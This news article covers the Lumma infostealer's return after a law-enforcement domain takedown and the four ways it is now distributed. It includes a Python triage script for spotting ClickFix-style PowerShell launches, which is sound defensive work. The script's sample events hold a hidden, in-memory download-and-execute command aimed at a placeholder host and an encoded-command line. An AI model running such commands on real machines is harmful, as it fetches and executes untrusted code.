2,300 Domains Seized, Yet Lumma’s Cybercrime Engine Reboots

The420.in Staff

The Lumma infostealer malware operation is back in full swing just weeks after law enforcement seized over 2,300 domains in a large-scale operation in May. According to cybersecurity firm Trend Micro, the Malware-as-a-Service (MaaS) platform has rapidly restored its infrastructure and resumed operations despite the massive takedown.

Operators behind Lumma Stealer acknowledged the disruption on underground forums but insisted their core server remained untouched, although it had been remotely wiped. Restoration began immediately, with evidence of resurgence seen in June. Trend Micro’s telemetry data now indicates that Lumma’s activity is nearing pre-takedown levels.

Trend Micro’s report confirms that Lumma has re-established its network by shifting away from Cloudflare and adopting a Russian-based provider, Selectel, to avoid further enforcement.


Sophisticated Tactics Signal Full-Fledged Comeback

Trend Micro has identified four main distribution vectors currently fueling Lumma’s infection wave:

  1. Fake Cracks/Keygens: Cybercriminals push fake software cracks via malvertising and doctored search results. Victims are redirected to deceptive sites using Traffic Detection Systems (TDS) to deliver the Lumma downloader.

  2. ClickFix Campaigns: Compromised websites host phoney CAPTCHA challenges that execute PowerShell commands, loading Lumma directly into system memory and bypassing traditional file-based detection.

  3. GitHub Repositories: Threat actors have seeded repositories with AI-generated content offering fake game cheats. These contain Lumma payloads as standalone executables or zipped files like “TempSpoofer.exe”.

  4. Social Media Lures: YouTube videos and Facebook posts promote cracked software, tricking users into downloading malware from sites that sometimes misuse trusted platforms like sites.google.com.
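The ClickFix vector above is the one a defender can most readily catch in endpoint telemetry: the victim is coaxed into pasting a PowerShell one-liner that runs hidden, is often encoded, and fetches its next stage straight into memory. The triage logic below is an added example written for this article, not code from Trend Micro or from the Lumma reporting; the process-creation events it scans are constructed samples with assumed fields (parent image, image, command line) in the shape a Sysmon or Windows 4688 feed would provide.

```python
import re

# Constructed sample process-creation events (parent image, image, command line);
# these are illustrative, not real telemetry from any incident.
SAMPLE_EVENTS = [
    ("explorer.exe", "powershell.exe",
     'powershell -w hidden -ep bypass -c "iex (iwr https://example.invalid/verify.txt)"'),
    ("explorer.exe", "powershell.exe",
     "powershell.exe -NoProfile -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"),
    ("cmd.exe", "powershell.exe", "powershell.exe -File C:\\scripts\\backup.ps1"),
    ("explorer.exe", "notepad.exe", "notepad.exe C:\\Users\\alice\\notes.txt"),
]

# Evasion traits typical of a ClickFix-style paste-and-run command.
HIDDEN_WINDOW = re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I)
ENCODED_CMD = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)
DOWNLOAD_EXEC = re.compile(
    r"\b(?:iex|invoke-expression)\b.*\b(?:iwr|invoke-webrequest|downloadstring|net\.webclient)\b",
    re.I | re.S)
# A Run-dialog (Win+R) launch shows up as an interactive shell parent.
INTERACTIVE_PARENTS = {"explorer.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

def clickfix_indicators(parent, image, cmdline):
    """Return the list of ClickFix indicators present in one process-creation event."""
    if image.lower() not in POWERSHELL_IMAGES:
        return []
    hits = []
    if parent.lower() in INTERACTIVE_PARENTS:
        hits.append("interactive parent (Run dialog pattern)")
    if HIDDEN_WINDOW.search(cmdline):
        hits.append("hidden window")
    if ENCODED_CMD.search(cmdline):
        hits.append("encoded command")
    if DOWNLOAD_EXEC.search(cmdline):
        hits.append("in-memory download-and-execute")
    return hits

def is_clickfix_candidate(parent, image, cmdline):
    """Alert only when an interactive parent is combined with at least one evasion
    trait; an admin launching PowerShell from Explorer on its own is not suspicious."""
    hits = clickfix_indicators(parent, image, cmdline)
    return len(hits) >= 2 and hits[0].startswith("interactive parent")

def triage(events):
    """Return (command line, indicators) for every event worth an analyst's attention."""
    return [(c, clickfix_indicators(p, i, c)) for p, i, c in events
            if is_clickfix_candidate(p, i, c)]

if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE_EVENTS):
        print(f"ALERT: {hits} :: {cmd}")
```

Only the two Explorer-spawned events with evasion traits are surfaced; the scheduled-script launch from cmd.exe and the notepad event are left alone, which is the false-positive control that makes a rule like this usable at scale.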


The return of Lumma—despite no reported arrests or formal charges—raises serious concerns about the long-term efficacy of takedown efforts. The MaaS model remains a lucrative and resilient arm of the cybercrime economy, with its operators seemingly undeterred by international action.
